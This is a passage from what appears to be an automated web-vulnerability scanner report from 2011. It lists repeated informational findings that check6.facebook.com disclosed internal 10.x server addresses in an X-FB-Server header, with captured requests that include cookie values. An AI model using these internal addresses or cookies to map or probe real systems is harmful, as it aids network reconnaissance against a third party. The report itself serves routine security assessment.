Date: Thu, 16 Jun 2011 14:19:13 GMT

/*1308233953,171363871*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.274. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.131.59

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.131.59
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:28 GMT

/*1308228988,171868987*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.275. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.86.32
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:22 GMT

/*1308230542,171333152*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.276. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.140.131

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.140.131
X-Cnection: close
Date: Thu, 16 Jun 2011 18:22:13 GMT

/*1308248533,176721027*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.277. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.63

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2299b5cf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.116.63
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:23 GMT

/*1308232403,171340863*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.278. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.61

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7876fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.145.61
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:18 GMT

/*1308245118,171348285*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.279. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.151.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.151.50
X-Cnection: close
Date: Thu, 16 Jun 2011 15:15:59 GMT

/*1308237359,171349810*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.280. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.37.62

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df125679654%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.37.62
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:56 GMT

/*1308247916,171320638*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.281. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.147.47

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.147.47
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:27 GMT

/*1308245427,171348783*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.282. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.149.107

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5518899%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.149.107
Connection: close
Date: Thu, 16 Jun 2011 16:54:13 GMT

/*1308243253,169907563*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.283. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.22.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.22.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:13:59 GMT

/*1308233639,171906605*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.284. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.103.126

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.103.126
X-Cnection: close
Date: Thu, 16 Jun 2011 18:32:35 GMT

/*1308249155,176711550*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.285. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.92.28

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1bef9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.92.28
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:59 GMT

/*1308244499,171334684*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.286. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.16.41

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3730c6874%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.16.41
X-Cnection: close
Date: Thu, 16 Jun 2011 14:14:02 GMT

/*1308233642,171905065*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.287. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.55.65

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.55.65
X-Cnection: close
Date: Thu, 16 Jun 2011 18:53:14 GMT

/*1308250394,171849537*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.288. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.144.119

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8396448%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.144.119
Connection: close
Date: Thu, 16 Jun 2011 13:17:17 GMT

/*1308230237,169906295*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.289. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.32.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.32.58
X-Cnection: close
Date: Thu, 16 Jun 2011 12:40:59 GMT

/*1308228059,171843642*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.290. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.185.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.185.51
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:58 GMT

/*1308239218,171882803*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.291. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.103.33

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9f0d99e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.103.33
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:42 GMT

/*1308240462,171337505*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.292. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.99.41

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.99.41
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:50 GMT

/*1308233330,171336489*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.293. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.246.39

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df315994844%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.246.39
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:51 GMT

/*1308240771,171898407*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.294. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.3.28

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14e6879a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.3.28
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:59 GMT

/*1308239219,171836188*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.295. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.111.65

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f6560a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.111.65
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:21 GMT

/*1308246981,171863873*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.296. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.18.61

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df365585b5%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
